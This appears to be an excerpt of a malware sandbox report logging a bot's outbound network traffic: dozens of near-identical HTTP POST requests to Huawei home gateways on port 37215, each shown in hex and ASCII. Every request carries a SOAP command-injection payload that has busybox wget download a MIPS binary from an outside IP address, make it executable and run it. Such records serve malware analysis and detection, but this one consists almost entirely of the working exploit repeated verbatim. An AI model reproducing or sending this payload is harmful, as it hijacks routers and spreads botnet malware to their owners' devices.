                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            726192.168.2.1351728197.76.64.637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.694480896 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            727192.168.2.1342650197.231.249.6637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.695811987 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            728192.168.2.1356356197.110.23.137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.696885109 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            729192.168.2.134258641.64.38.15637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.698008060 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            730192.168.2.135693241.161.75.21937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.699989080 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            731192.168.2.133546841.229.41.1437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.701066971 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            732192.168.2.1344722156.243.126.8237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.702109098 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            733192.168.2.1345526156.79.220.9637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.703161001 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            734192.168.2.134085641.213.236.15137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.704449892 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            735192.168.2.134964441.150.3.19537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.705524921 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 